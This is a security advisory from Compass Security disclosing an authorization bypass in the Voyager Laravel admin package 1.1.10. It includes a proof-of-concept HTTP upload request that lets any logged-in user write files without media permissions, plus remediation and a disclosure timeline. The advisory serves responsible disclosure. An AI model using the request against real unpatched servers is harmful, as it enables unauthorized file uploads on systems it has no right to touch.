############################################################# # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/research/advisories/ # ############################################################# # # Product: Voyager # Vendor: The Control Group (Open Source) # CSNC ID: CSNC-2018-38 # Subject: Authorization Bypass # Risk: High (CVSS 3.0 Base Score: 7.1) # CVSS 3.0: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N/E:P/RL:O/RC:C # Effect: Remotely exploitable # Author: Fabio Poloni # Date: 07.11.2018 # ############################################################# Introduction ------------ Voyager [1] is a Laravel Admin Package that includes BREAD(CRUD) operations, a media manager, menu builder, and much more. To upload files, there is a media manager available, which can upload, rename and delete files on the filesystem. The manager API is available for any logged in user. Affected -------- Vulnerable: * Version 1.1.10 Other versions are not tested. Technical Description --------------------- The API of the media manager can be used even if the user does not have access to the "Browse Media" permission. ```` POST /admin/media/upload HTTP/1.1 Host: localhost:8000 X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------178790972713939268652054415808 Content-Length: 510 Cookie: XSRF-TOKEN=[...]; laravel_session=[...] Connection: close -----------------------------178790972713939268652054415808 Content-Disposition: form-data; name="_token" [...] -----------------------------178790972713939268652054415808 Content-Disposition: form-data; name="upload_path" -----------------------------178790972713939268652054415808 Content-Disposition: form-data; name="file"; filename="test.txt" Content-Type: text/plain This should not be uploaded! -----------------------------178790972713939268652054415808-- ```` The file then can be accessed as expected on "http://example.com/storage/test.txt". Vulnerability Classification ---------------------------- * CVSS v3.0 Base Score: 7.1 * CVSS v3.0 Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N/E:P/RL:O/RC:C Remediation ----------- Update to the latest release (1.2.0). Please see Voyager releases [2] for release notes and download links. Timeline -------- 2019-03-05: According to vendor the vulnerability has been addressed (https://github.com/the-control-group/voyager/pull/3821) 2018-12-20: Vulnerabilities confirmed 2018-12-18: Fifth contact attempt via email to a former and current maintainer, response received 2018-11-23: Forth contact attempt via email (hello@thecontrolgroup.com) and direct contact to employee on LinkedIn 2018-11-16: Third contact attempt via email (hello@thecontrolgroup.com) 2018-11-14: Second contact attempt via Twitter (@ControlGroup_SD) 2018-11-07: Initial vendor notification via contact form (https://thecontrolgroup.com/contact) 2018-11-05: Discovery by Fabio Poloni References: ----------- [1] https://github.com/the-control-group/voyager [2] https://github.com/the-control-group/voyager/releases